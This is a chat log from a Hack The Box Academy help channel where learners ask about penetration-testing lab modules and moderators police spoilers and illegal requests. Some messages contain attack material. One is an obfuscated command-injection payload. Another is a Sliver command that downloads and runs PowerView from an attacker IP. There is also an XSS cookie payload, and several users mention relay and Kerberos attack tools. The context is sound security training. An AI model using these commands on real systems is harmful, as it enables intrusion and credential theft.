I'm blocked in the SQL Injection Fundamentals -Skill assessment and I see I'm not the only one.. If anybody could be a bit more precise and give some help it would be highly appreciated (tried all the payloads, used the repeater in burp, etc... but I just can't bypass the login..)

full patio
#

No word of a lie, I must've been hitting away at this Skills Assessment Part II for days now.

I'm completely stuck on question 8 (Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host) of this module: https://academy.hackthebox.com/module/143/section/1279

Can anyone give a hint as to how to proceed?

viscid girder
terse sedge
#

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

torn rune
#

Hi everyone,
I'm still stuck with the Web Fuzzing - skills assessment, can't figure what I'm doing bad since 2 days now.
I found some endpoint but nothing relevant.
If someone nice can help me, I will be grateful.

solar depot
#

Hi guys, I'm currently working on the HTB File Inclusion Skill-Assasement and could really use a hint. I've been going in circles for days now.

dusty bison
solar depot
#

I would have a hint for the first step LFI

dusty bison
solar depot
gray yacht
#

This has nothing to do with HTB Academy modules.

blazing cargo
#

I'm stuck on Pass the Certificate in the Password Attacks module.
I can't complete Question 2 — "What are the contents of flag.txt on Administrator's desktop?" because printerbug.py fails to obtain the .pfx, so I can't move forward. What should I do?

tepid path
#

Hello, is this the right place to talk about pro-labs?

cloud urchin
gritty dock
gritty dock
idle shuttle
#

Yes men software creppy

#

Tell girl not play

#

Men all date girl

#

Andress number aphone ip all

cloud urchin
#

@idle shuttle you're talking gibberish. also this channel is for talk about modules. Follow the instructions in #welcome to gain access to other channels.

silk nimbus
#

I'm a beginner with basic Python skills and want to start participating in Capture The Flag (CTF) challenges. Could you guide me on how to start from scratch and improve my skills to participate in these events?
Reply please

cloud urchin
silk nimbus
civic inlet
#

Hello guys I am doing Attacking AI - Application and System module and on the Model Deployment Tampering section. The question is:

Exploit the ShellTorch vulnerability to obtain the flag.

I have done the steps required to get a rev shell but it's still not working is it possible if I can DM someone to help me because I don't know what I'm doing wrong because my payload is the exact same as the walkthroughs

uncut turtle
#

hey guys im stuck big time. Im doing the "Pass the ticket from Windows" lab but im stuck on the question "Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john" found the file but it keeps saying Access is Denied. I need help big time please:(

civic inlet
#

omfg bro i just figured it out

#

lol

quasi wave
#

for the ACL Abuse section of AD Enumeration and Attacks module there's only one question. my issue is I am trying to add the user it tells me to add and it is saying I am entering the wrong username or password. Can someone help me out?

#

I need to add a user to a group to bypass the permissions of the network.

#

anyone able to DM?

merry zinc
#

Howdy!!! i need some help. I'm working on skilss assessment on network foundations Chapter 3 : Target Acquired. After login on first terminal to use ftp after Passive mode entered and obtaining the ports for the calculation, whenever i open the 2nd terminal and try to netcat to the data channel i got message connection refused

merry zinc
silk lagoon
#

Anyoen able to help with **nosql injection skills assessment II **?

waxen totem
glad narwhal
#

anyone else getting a 429 too many requests error on htb academy forum website...

cloud urchin
#

They're sunsetting the forums.

mighty matrix
#

Hi guys

#

in this link I think theres a mistake

#

it literally contradicts itself

#

can someone explain if Im trippin or if the actual answer is True or if theres something up with the module, please

waxen totem
cloud urchin
#

@mighty matrix Please take care to not post answers

mighty matrix
quiet halo
#

In Pivoting, tunneling and port forwarding section Socat Redirection with a Reverse Shell, why is a Windows payload being created if the web server is ubuntu?

quiet halo
#

oh nvm the server is a pivot point, didnt see that part

dull solar
waxen totem
#

@dull solar I know it's technically in a module but please don't spoil the method. Some people want to do it blind

#

And yes there is an easier way to do it than what the module shows

paper crag
#

Hey did you resolve this? I'm having the same problem

waxen totem
#

@devout lily please try not to spoil skill assessments.

sudo su

then try again

devout lily
cloud urchin
#

@hardy vessel Nope read the #rules we do not condone illegal activity.

quaint wigeon
#

Is hackthebox academy learning style hands-on or just text based ?

glacial gulch
acoustic owl
quaint wigeon
#

So i cant just stick with htb academy? Do i need htb labs subscription

acoustic owl
#

All you need to learn is the Academy

glad lava
#

hey guys why i can't mark certian module complete? there's no option for me to mark complete tho? i am left iwht like 18/19 progreess

solar vessel
#

Halo

torpid rose
#

Hello,
I'm having a problem with the "Attacking Email Services" module.
I can't start the target.

What should I do?

solar grove
#

Is there a problem with HTB Academy? The target IP address isn’t showing up.

glacial gulch
#

Those wondering how to do file inclusion room, you should get rce with contact.php file i think this is enough hint. BTW another hint is that to get correct hashed name of the file that you are uploading host that application php file on your machine and get the full name of file that you would have been uploaded to htb machine

torpid rose
#

I had to change VPNs to be able to finish the module.

solar grove
solar grove
glad lava
#

i cant complete the vhost module tho

#

no button for me to complete , i am stuck at 18/19 , like i want full progress completion on it

vernal tapir
gentle nexus
#

hi guys

#

who's have than 3 month on the world of hacker

acoustic owl
gentle nexus
#

Well, I'm new to the hacking world and this week I've been learning the basics of networking and how it works and a little bit of how to program in Python.

dark jay
#

hello can anyone help me with academy Command Injections Advanced Command Obfuscation

  • 2 Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
    here is the command i am doing
    127.0.0.1%0a%09$(rev<<<'dnif')%09${PATH:0:1}%09$(rev<<<'rsu')%09${PATH:0:1}$(rev<<<'erahs')%09%257C%09$(rev<<<'perg')%09$(rev<<<'toor')%09%257C%09$(rev<<<'perg')%09$(rev<<<'lqysm')%257C%09$(rev<<<'liat')%09$(rev<<<'n-')%091
naive sage
#

Windows Evasion Module.

I have placed the perfectly fine working loader in C:\Alpha\Static\ and funny enough I can't get flag.txt generated while log.txt yields I'm back and malware works.

#

@dense ferry Hi.

tepid peak
#

Are the module targets having a time out for anyone else too ? I can't seem to get any to start up

molten shoal
#

Hey, am I the only not able to spawn any target system ?

barren mural
#

same

molten shoal
tepid peak
#

Aight cool

spice sentinel
neat badger
#

Why only this channel i can post in 🤔

rotund python
#

Hello, I have a problem with spawning a target system in The Intro to Network Analysis: Guided Lab: Traffic Analysis Workflow. Yesterday, it was working quite fine but today, clicking to spawn the target system doesnt generate any IP address. Any help would be appreciated. Thank you!

nova pivot
#

Same here, can't spawn Windows privesc machines

rotund python
#

oh, so its a widespread problem

nova pivot
#

My advice for now : Keep taking notes on the next chapter until resolved

tepid peak
#

I've already raised a ticket just in case but Idk if they get read During the weekend

pastel atlas
dense jacinth
#

Hi, is there an issue with skill assessment for pivoting and tunneling lab? When i click to spawn the target system it loads then nothing

solar grove
gray yacht
tepid peak
#

Didn't know existed🥀

solar grove
#

HTB Academy

Operational

It shows up, but the target isn’t working.

gray yacht
#

Well that's the platform. It does mention a systems minor outage and an issue with VPN.

#

Might be what is impacting you all.

gray yacht
#

I can check a lab/SA on my end, just give me one that wasn't working that is in CPTS or CAPE path.

#

I saw Win Priv Esc, so lemme just try one of them.

#

So VPN connected on my end and Windows Priv Esc - Server Admins section lab launched and I was able to connect via RDP as per the lab instructions.

tepid peak
gray yacht
tepid peak
#

Maybe an EU thing then

tidal dove
#

Hi guys, is anyone also facing issues with the target not spawing ?

gray yacht
rotund python
gray yacht
#

Yup just confirmed it on my end after switching to an EU VPN and the target did not spawn. So if you are currently on EU it is recommended to roll to a US connection until it is fixed.

bright trench
#

Hello im having trouble with the final assignment of llm output attack under red team Ai. If anyone can help me, been stuck on it for days now.

gray yacht
manic void
#

no idk how to switch servers

river grove
#

Are there any problems with the target servers? I tried spawning them whole day but they're just stuck at "Target(s) are spawning..."

gray yacht
river grove
gray yacht
# river grove

Yeah same comment applies to targets. Scroll up a little and you can see what was identified a little earlier.

whole island
#

A friend of mine that lives in belgium is having the same issue, but i tried and it spawned. I also live in europe

quiet hemlock
#

guys sorry for asking here but does anyone has issues with the htb machines like i cant spawn a retired machine

shut delta
#

same

quiet hemlock
#

so im not the only one good to know 😄

#

i though because i just bought the vip + for the labs

whole island
#

But yeah, seems like a lot of people are having this issue. Has anyone from HTB said anything ?

quiet hemlock
#

dont know anything

#

i was playing without the subscription and everything was fine the moment i bought i got this issues

whole island
#

could be that yall have some other machine spawned already ? apparently you have to terminate one before spawning another

whole island
quiet hemlock
#

checked it i didnt have any other machine tried this

quiet hemlock
whole island
quiet hemlock
#

in the academy i dont have issues only with the labs i tried switching vpns there is also this help for trouble with the connections tried some steps but nothing worked

whole island
#

I find the whole website is kind of sluggish no? No clue bro, sorry

quiet hemlock
#

its allright bro thanks anyway

#

yea it really is sluggish tbh

quiet hemlock
#

thanks

whole island
#

Ive heard they are doing a merge ? is that true ?

quiet hemlock
#

i dont know

whole island
#

seems like it, but they the one acquiring not the ones being acquired, so thats cool

mighty lance
#

Hello, I'm doing the Pass the Ticket (PtT) from Linux section in the Password Attacks module. I'm at the part where it's talking about "Using Linux attack tools with Kerberos" and it goes over using Chisel & Proxychains. I understand everything besides one part.

TL;DR are chisel & proxychains being used together or are they separate methods?

It says we need to configure proxychains to use socks5 & port 1080, which is used later with evil-winrm. I got that part, but my confusion is with chisel in this section. We setup a chisel server on our attack host and it uses port 8080 by default. Then we have MS01 connect to us as a chisel client.

What's the purpose of using chisel in this section? Are we using a combination of chisel & proxychains? Because I don't see proxychains or any other tool using port 8080 to utilize our chisel connection. Or is the section showing us 2 methods (proxychains OR chisel) of accomplishing this attack?

glad lava
#

so anyone solved SQLi latest assessment so far?

cyan veldt
#

Hello, in the Introduction to network, do I need to memorize all the protocols in common protocols and networking key terminology sections ?

native turtle
#

is there anyone who can ask help for sliver C2 module, in particular Kerberos Delegation & Enumeration section

#

I cant spawn psexec shell to run .\Rubeus.exe monitor /interval:5 /nowrap

#

im trying to do unconstrained delegation attack but im afraid im missing the question point Submit the Administrator's NT hash

deep grotto
cyan veldt
deep grotto
#

http https sql ftp

cyan veldt
#

sql is a protocol??

deep grotto
#

it has a port

#

1 moment

median warren
#

hello, i have a problem on sliver C2 module, trying to do execute-assembly /home/kali/.sliver-client/aliases/sharpview/SharpView.exe "Get-NetUser -PreauthNotRequired" -t 240 -i -E -M but it shown an error everytime .. or this command sharpsh -- '-u http://10.10.15.159:80/PowerView.ps1 -e -c Z2V0LW5ldHVzZXIgfCBzZWxlY3QgIHNhbWFjY291bnRuYW1lLGRlc2NyaXB0aW9u'

deep grotto
#

maybe im misrembering, but ysterday was doing lab or machine and had this port i coud use

#

but sql is not a protocol sor, it has a port

#

ok damn sorry man im tired i msread ur question

cyan veldt
#

so http https FTP is the important ones

deep grotto
#

tcp and udp

whole island
naive sage
cyan veldt
#

Because there’s a lot of protocols

deep grotto
#

also has port

median warren
whole island
# cyan veldt Because there’s a lot of protocols

yeah, there's a looot of them, memorizing them all might take a while. Focus on a few common. TCP, IP, UDP, HTTP/HTTPS, SMB, FTP, SSH.. dont worry about memorizing them all, youll google a lot of it

naive sage
naive sage
#

oh my bad, I didn't see the size of file.

median warren
whole island
deep grotto
#

u have multiple sql ports

#

it was more explaininmg what i meant

whole island
# cyan veldt Okay so just these 8

honestly, these are fine to know by heart. you'll learn as you go, repetition will make the difference as well, the more you do, the more you internalize the knowledge

naive sage
whole island
#

the pings are too damn high today

median warren
lyric bluff
#

Windows Attacks & Defense module
where am supposed to find the wordlist rockyou.txt?

the hint says ```Use the SecLists/Passwords/Leaked-Databases/rockyou.txt password list


but there is no such thing in my kali attack box

also when i try to ssh kali@targetip it says connection refused
nova radish
#

Hi guys

steep zinc
#

NTLM Relay Attacks skills assessment: I was able to compromise BACKUP01$ but I am unsure how to proceed next to compromise DC01. I also cannot get the password of the sqlftp user also. Any help is greatly appreciated! Thanks!

cloud urchin
hexed osprey
#

hello guys im stuck at the new file inclusion skill assessment any hints would be appreciated

hexed osprey
paper wolf
#

Hi, is there anyone I can dm about LLM Output Attacks Skills Assessment ?

terse sedge
#

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

bright trench
#

Hi everyone I need help with the llm data attack output final assignment. Ive been stuck on getting the flag for days. If anyone can offer some guidance I would appreciate it. Thank you.

median kettle
#

@terse sedge i believe you need to download the printerbug.py on your on kali laptop and run it from that machinen not attack box, i believe that worked for me

#

can someone help me? im stuck on session hijacking for cross site scripting. my php code works, and i validated the payload to use, but im not getting the admin cookie

terse sedge
#

@median kettle I'm doing this from my own kali VM. Haven't tried it on attack box.

median kettle
#

@terse sedge i assume you downloaded printerbug.py from github yeah?

cloud urchin
#

@honest cave No. Read the #rules. We do not condone illegal activity.

terse sedge
#

I have it on my kali VM. I don't recall where I got it from.

median kettle
#

@terse sedge sorry, im having to hunt down my notes somewhere, gimme a sec

#

@terse sedge 1. is the dc's ip in your etc/host file? 2. remove printerbug and download it from github (just to make sure). these are what my notes are telling me

shrewd thorn
#

guys in
Information Gathering - Web Edition - Skills Assessment

after execuring python ReconSpider.py http://inlanefreight.htb:48743/

the results is:
cat results.json
{
"emails": [],
"links": [],
"external_files": [],
"js_files": [],
"form_fields": [],
"images": [],
"videos": [],
"audio": [],
"comments": []
}%

and cant complete the tasks, any help

obsidian pawn
#

Why i can't talk in general

cloud urchin
#

@obsidian pawn Change your profile text please

#

We do not condone illegal activity

obsidian pawn
#

Where is the illegal activity in it?

cloud urchin
#

Don't play stupid, this is your only warning

obsidian pawn
#

Ahh

#

Done

#

Now i want to talk in general

cloud urchin
obsidian pawn
#

I follow it

#

Sorry

#

I don't see it

cloud urchin
#

You have to link your HTB account by following the instructions outlined in the post in #welcome.

median kettle
#

disregard i figured out my proble, haha

terse sedge
#

I tried deleting printerbug.py and downloading a new one. Now I get File "/usr/lib/python3/dist-packages/nxc/modules/printerbug.py", line 120
<title>krbrelayx/printerbug.py at master · dirkjanm/krbrelayx · GitHub</title>
^
SyntaxError: invalid character '·' (U+00B7)

cloud urchin
#

You probably didn't download the raw file and instead downloaded the github page that contained the file

#

Because your error message has html tags in it

terse sedge
cloud urchin
#

visit that page

#

you can see it's not raw python, it's a html page

#

click the "raw" or "download" button to get it on your link

#

also no need to sudo to wget

terse sedge
#

Looks like that worked. I still had to use sudo. I kept getting access denied messages.

pine hornet
#

Hi guys, got a question

#

After installing the Parrot OS I can't find the tools list like shown in the picture

acoustic owl
pine hornet
#

The tools list they reffer in the middle of the page:
tools.list
after upgrading and updating the system

#

most of the tools are installed but are to be found on usr/bin

acoustic owl
#

This is a list created by the author. It is not included in the system.

native turtle
#

need help with C2 operations with sliver module 🙁

bleak coyote
native turtle
#

Kerberos Delegation & Enumeration section, I dont understand what I need to do, if I need to exploit uncostrained delegation, psexec doesnt work to use rubeus monitor command

gray yacht
gray yacht
native turtle
#

@gray yacht thx

hybrid vine
#

I'm having a lot of issues with the Introduction to Digital Forensics module. I'm trying to do the exercise in the Evidence Acquisition Techniques & Tools section.

I need to connect to an IP address through RDP. This is the first step of the exercise. My VPN is switched on and my first command is a ping to the IP. The ping is successful.
Then I write: "xfreerdp3 /u:Administrator /v:IP-Adress"
It will prompt me to give a password, which I give. A new window opens and I log in, but a few seconds after getting access, it completely crashes. The window disappears and the instance dies (can't be pinged anymore)
I have tried this 3 times already and I can't get it to work. What's the issue here? I can't solve it on my side it seems. Is the remote instance broken?

terse sedge
#

In Password Attacks - Pass the Certificate, when running impacket-ntlmrelayx, I get the following errors:

Exception in thread Thread-6: Traceback (most recent call last): File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner self.run() ~~~~~~~~^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run ADCSAttack._run(self) ~~~~~~~~~~~~~~~^^^^^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run certificate_store = self.generate_pfx(key, certificate) File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx p12 = crypto.PKCS12() ^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__ obj = getattr(self._module, attr) AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12

#

What could this mean?

gray yacht
# terse sedge In Password Attacks - Pass the Certificate, when running impacket-ntlmrelayx, I ...

Quick Google search of AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12:
https://github.com/fortra/impacket/issues/1716

GitHub

Configuration impacket version: 0.11.0 Python version: 3.11.8 Target OS: Kali Linux Debug Output With Command String ntlmrelayx.py -t ldaps://domain.com --shadow-credentials -smb2support --no-dump ...

gray yacht
worn sun
#

any help on the machine DarkZero would be appreciated, any small hint : )

cloud urchin
cloud urchin
#

@crimson moon Please do not reveal contents of modules above tier 0, especially attack paths in skill assessments. you were on the right track.

crimson moon
#

Sorry about that how do I obfuscate info? I’m noob in discord

cloud urchin
#

Just say what you're stuck on, module, section, question. If you feel like you need to reveal more detail you can take it to DM, but remember anyone who has done it doesn't need details because they know the way to do it already.

crimson moon
#

Ok gotcha

thin patrol
#

Hello everyone can someone confirm whether the sql injection fundamental assessment is working fine and solviable trying for 2 still no clue

cloud urchin
#

It works

thin patrol
#

Can someone proivide a hint for solving this sql injcetion fundamental assesement.

unique field
#

hello can anyone kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this

rugged hull
#

it's quite frustrating that I could not get to the machine using smbclient. Is there anything wrong with the server or what did I do wrong?

cloud urchin
#

well the error says it's timing out. is this the pwnbox, or your own vm? are you running the pwnbox and a vm at the same time?

rugged hull
#

this is htb's pwnbox.

#

and no, Im not running my vm at the same time

maiden frost
#

hey everyone

#

is there any one would like to join me playing pro labs?

slender thunder
tulip dagger
#

Can someone help a girl out

cloud urchin
cloud urchin
stoic hatch
#

Hey Everyone I need help_!
any quick way to validate passive subdomains at scale (50–200 domains) without making noise? Just need 2–3 real commands you trust for clean validation before scanning.

cloud urchin
cunning jay
#

Hb

#

Hry

#

Hey

gritty dock
golden halo
#

Hey guys, I need help:
Module: Pivoting, Tunneling, Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP

Problem: I transferred the SocksOverRDP-x64.zip to the Windows pivot host and then unzipped it and tried to do the regsvr32.exe SocksOverRDP-Plugin.dll command but kept getting this error. This didn't happen in the example so wondering where I went wrong

Any advice?

cloud urchin
#

disable real time protection

worthy sorrel
#

In sql injection fundamental skill assessment I was able to bypass register page and able to logged in but after login there is only one request I found vulnerable to sql injection that too is not actual sql injection parameter by which I can get info because that is time based sql injection so if anyone has any hint let me know

fallow monolith
#

Hello HTB,

My subscription is expiring soon and I don't plan to renew for now.
I have some modules that I started and haven't completed yet. Do I lose access to them when my subscription ends ?
Thx !

cloud urchin
#

You only keep modules you completed

fallow monolith
#

okay

#

thx !

thin patrol
worthy sorrel
unique field
#

@fathom pendant can you kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this

unique field
native dome
#

Hey everyone 👋 I’m currently working on the XSS module, but I’m a bit stuck — when I try <script>alert(document.cookie)</script>, nothing pops up (no alert). Anyone know what I might be missing?

glass raft
#

Huhu, Footprinting was fun. I have a little Problem i cant complete Footprinting/ MySql. I Have the right answer and it is Green but i cant Mark Complete :). Had anyone this Problem ?

unique field
native dome
worthy sorrel
#

Ctrl+shft+r

gray yacht
# hybrid vine Nope, it's still not working

You can open a support ticket to report your issues. I haven't worked through that module/section, so I don't know if there is something else going on that you could do on your end.

native dome
worthy sorrel
native dome
gray yacht
#

This is not that type of server.

azure basalt
#

Oh

remote merlin
hexed osprey
#

hello guys Im doing the new sql injection fundamentals skill assessment i managed to bypass the login page via reusing the invitation code and im stuck now any help?

quaint wigeon
#

Hello guys do you think HTB Academy content is enough to got the cpts certification (for a beginner) ??

brazen saffron
#

#cpts and doing only modules is not enough, you need to practice.

#

You should start with CJCA to have a good start and then do CWES or CPTS.

hasty mauve
cyan arch
#

and also machines

quaint wigeon
#

Ok i think i need to finish the cjca modules before cpts

near spire
#

Is anyone's spawning VM interacting function doesn't work? I'm getting This site can’t be reached Check if there is a typo in vnc.htb-cloud.com

slender tapir
#

Hi folks, I'm not a java expert but I can tell when I'm doing something wrong - in the 3-tier Thick Application stage of Attacking Common Applications, I'm following the instructions on the page. When I rebuild the "traverse.jar" file, it appears a much smaller size than the original file(s) and does nothing when I run it. I've gone wrong somewhere and it feels like a java knowledge gap rather than anything else - any suggestions?

alpine ingot
#

I need some help with AEN. My bloodhound is not showing the same thing that is in the walkthrough despite trying multiple different ingestion methods.

acoustic owl
devout lily
#

Information Gathering - Web Edition - dig
Hi everyone, i dont see the message "Spawn the target" in the exercise section, why?

#

This is what i am seeing

hidden ledge
#

Hello, I'm not sure to understand this note from the Pass the Ticket from Windows section in the Password Attack module:

Note: At the time of writing, using Mimikatz version 2.2.0 20220919, if we run sekurlsa::ekeys it presents all hashes as des_cbc_md4 on some Windows 10 versions. Exported tickets (sekurlsa::tickets /export) do not work correctly due to the wrong encryption. It is possible to use these hashes to generate new tickets or use Rubeus to export tickets in Base64 format.

Can someone explain me ?

hidden ledge
limpid hemlock
#

Hey can someone help me with the lolbins module I'm windows evasion path I've been trying to get a shell and all for so long but Nthg is working

vapid maple
#

Need help with Documentation & Reporting Practice Lab

Everytime i try to import into bloodhound I get a failure. Ive tried multiple times to retreive the data and even spun up a new Kali box to see if that could be the error.

acoustic owl
#

Did you use the right ingestor? It must match the BloodHound version.

vapid maple
#

its the one that was preinstalled with the lab that was spun up

acoustic owl
#

This version is probably not compatible with your BloodHound.

vapid maple
#

alright. so I need to investigate how to either update the lab or downgrade bloodhound

acoustic owl
#

If you use BloodHound CE, you can download the correct ingestor directly in BloodHound.

vapid maple
#

ok, so I will need to install that into the provided vm?

#

I hate bloodhound lol

acoustic owl
vapid maple
#

no ive been running my own kali box in preperation of the CPTS

#

if you recommend to use the pwnbox, I will use it. this is the last question for the enter path

acoustic owl
#

No, I do not recommend the PWN Box.
If you use Kali, install the latest version of BloodHound CE and then download the correct ingestor from there, or use NetWxec.

vapid maple
#

thanks. I will see what I can figure out. been working on this seemingly simple question for a week now. never considered the difference in verisons

#

now when I put the new bloodhound files as a zip on the desktop of the attack box I loose rdp and cant reconnect....

alpine ingot
vapid maple
#

yea this is getting very frusterating, resetting the box for the 3rd time today

#

just reset everything again and lost connection without doing anything....

acoustic owl
half saddle
#

Greetings everyone, I'm a little stuck with the new Skills Assessment - File Inclusion. Has anyone solved it who can give me some guidance?

river stream
#

I tried everything and all says that the uid is 1000 but the system disagrees. Anybody know why?

#

Already did. Nothing.

vapid maple
#

so much for a new verison of the collector going to jsut search the web for the answer

fossil jacinth
vapid maple
fossil jacinth
#

And which version of Bloodhound Legacy are you using ?

vapid maple
#

8.2.0

#

oh legacy. im using ce

acoustic owl
fossil jacinth
#

Oh ... CE ... Sorry not familiar with it.
Did you try to use the Sharphound that comes with it ?

acoustic owl
#

You need this Version for BloodHound CE

fossil jacinth
#

Yep, that's the version for CE

acoustic owl
#

Or just use NetExec

vapid maple
#

let me try again. last time it wanted to update dependanies on the attack box which it cant do becuae the attack box cant get in the internet

fossil jacinth
#

Not sure if it's supported in CE, but try to unzip the file and ingest a file at a time

vapid maple
#

yea that is the verison I tried, it wanted to update python which it cant do

half saddle
#

Greetings everyone, I'm a little stuck with the new Skills Assessment - File Inclusion. Has anyone solved it who can give me some guidance? Let me now, please

vapid maple
#

ForP44 - getting file ingestion errors

river stream
fossil jacinth
#

On every single file ? @vapid maple

vapid maple
#

only a few line computers and users

#

and need users to answer the question

fossil jacinth
#

Have you tried to use the sharphound.exe that comes with CE ?

vapid maple
#

let me see if its on the attack box to get the data

#

its a linux box, so I doubt it

fossil jacinth
#

In Bloodhound CE ... there is a way to "create" the sharpdhound.exe

vapid maple
#

let me see what i can figure out

fossil jacinth
#

He said file ingestion errors

#

There is an option "Download Collectors" in CE which will give a sharphound.zip @vapid maple
Unzip it and transfer the .exe to the target.
Then run it and try to ingest that zip file in your CE.

vapid maple
#

I dont see that option in CE, let me search for it

#

but you cant run an .exe on a linux box...

fossil jacinth
#

Oh ... the target is a linux.
Welp, try netexec ldap --bloodhound ?

vapid maple
#

getting a 404, guess that wont work. guess blood hound isnt installled correctly on this kali box

snow imp
#

help with windows attack and defense kerberoasting module?

fossil jacinth
#

@Decoy I am using the Bloodhound legacy 4.3.1 version so I can't help with newer stuff.

vapid maple
#

Im walking away for a bit, getting to frustrated at this box. again. Thank you all for your help

fossil jacinth
#

good luck

fossil jacinth
#

Umm which path is that ?

snow imp
#

securtiy analyst

fossil jacinth
#

Haven't done it ... But take your shot, someone might help. Explain what you've done

glacial gulch
river stream
#

I tried everything in every format.... Still nothing

fossil jacinth
#

Have you tried something like index.php?page=../../../../etc/passwd ? @river stream

neat badger
#

Why is it only here i can post? Do I need to sub to get access other channels?

snow imp
#

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? ...this is the question...getting neary hundred thousand results.any help

half saddle
fossil jacinth
#

Oh they change it

river stream
half saddle
desert aurora
#

🍊

#

How does 1 hack

river stream
#

still says incorrect answer

terse sedge
#

I'm in Password Attacks - Pass the Certificate - Getting errors when I run gettgtpkinit.py:

File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module> main() ~~~~^^ File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main amain(args) ~~~~~^^^^^^ File "/home/kali/PKINITtools/gettgtpkinit.py", line 302, in amain ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams) File "/home/kali/PKINITtools/gettgtpkinit.py", line 47, in from_pfx with open(pfxfile, 'rb') as f: ~~~~^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '../krbrelayx/DC01$.pfx'

The last line really doesn't make any sense, since impacket-ntlmrelayx ran before this, and says it wrote the cert successfully. Any ideas?

sacred bolt
#

Guys any tips in how I can install ubuntu ✌️💔🥀

acoustic owl
sacred bolt
#

But like the hardware part 💔💔

timber rover
#

Hello chat

compact temple
#

.

sacred bolt
timber rover
#

twin

#

Go watch tuts it's easzzzzzy

cloud urchin
sacred bolt
cloud urchin
#

You didn't read the #rules and follow the instructions in #welcome. Once you do you get access to more channels.

remote merlin
#

Dude can anyone help me with question 3 in the module assessment on using web proxies? Its the question on the decoded md5 cookie, they want you to fuzz the missing last character of the cookie using alphanum.txt

terse sedge
#

I'm in Password Attacks - Pass the Certificate - Getting errors when I run gettgtpkinit.py:

File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module> main() ~~~~^^ File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main amain(args) ~~~~~^^^^^^ File "/home/kali/PKINITtools/gettgtpkinit.py", line 302, in amain ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams) File "/home/kali/PKINITtools/gettgtpkinit.py", line 47, in from_pfx with open(pfxfile, 'rb') as f: ~~~~^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '../krbrelayx/DC01$.pfx'

The last line really doesn't make any sense, since impacket-ntlmrelayx ran before this, and says it wrote the cert successfully. Any ideas?

fossil jacinth
#

I know I had some errors on that assessment and had to create a separate virtual environment for the PKINIT tools @terse sedge

#

Also, maybe try and give the full path instead of a relative one

#

@remote merlin try and use Burp ... If I remember correctly, first you need to append a char to the cookie, encode it and then send that request

azure basalt
#

Hey do any of y’all sell services

fossil jacinth
#

White-hats in here I'm afraid @azure basalt

azure basalt
#

What’s that

#

White hats

terse sedge
#

I'm not sure what the full path would be. ntlmrelayx doesn't show the full path, just ../DCO1$.pfx

fossil jacinth
#

What type of service are you trying to purchase ? @azure basalt

azure basalt
#

Modding a game

fossil jacinth
#

Yeah, well ... I believe you need it's exact location @terse sedge

#

@azure basalt This channel is for modules from the HTB Academy.

azure basalt
#

Interesting

tepid nimbus
#

Hi

#

I’m new

fossil jacinth
#

😉

azure basalt
fossil jacinth
#

Not really, nope.

azure basalt
#

Oh ok

gray yacht
remote merlin
#

Just giving a shoutout to @fossil jacinth thanks for pushing me back to use Burp suite for this task. It really worked, along with this article that helps with understanding the rest of the assessment I also give a shoutout to the author of this article. https://medium.com/@mxq164/web-proxy-skill-assessment-htb-0eb3b96e2f00 If anyone else needs help with it.

Medium

Start your Burpsuite! It is time to look into some web stuff after dealing with AD for a while now!

hollow peak
#

Are there more people who are stuck on the Skills Assessment - File Inclusion?

#

Having a hard time understanding where the application file is stored. Am I overlooking anything in the environment itself or in the reading material? Going crazy right now

frosty crescent
elfin kindle
#

m

#

because I can't send messages in general

cloud urchin
neat basin
#

Hey

cyan veldt
#

Hey, in the web request model second sections. the curl -k is not working. I did curl -h and didnt see -k so im not sure if thats a command in curl

frosty vault
#

Hey everyone it's actually rude not welcoming your newest fan/member

cloud urchin
#

It's rude not reading the rules, this channel is for discussion of modules on HTB not welcomes. You can join #general for that. Read the #rules and follow the instructions in #welcome.

glad lava
#

does anyone have the issue with " Information Gathering - Web Edition " module?

you can't really click the full complete button
Like there's no button for you to fully complete the specific module "vhost "

cyan veldt
#

HTTPS doesn’t work with curl

autumn pilot
#

What is the error message that you are seeing from curl

autumn pilot
#

Okay, what is the command you are running

cyan veldt
#

curl -k https://

#

and whatever the domain was

calm obsidian
#

Im about to start a wifi based module and I bought an AWUS036NHA and downloaded the drivers but can't get it to work on linux VM or on windows. Does anyone know if it is too old?

cyan veldt
cloud urchin
autumn pilot
#

Double check the command you are running and the one in the section

sleek sentinel
#

I’m having issues with the question in Web Request module. It asks me to download the page on the following path /download.php

The command i use is:
curl ip:port/download.php
But nothing happens

lapis plinth
#

Try to add "http://" before ip

timber rover
lapis plinth
#

I just tried and it worked

#

but also worked without "http://"sadglas

#

can u ping to the ip?

hearty forge
#

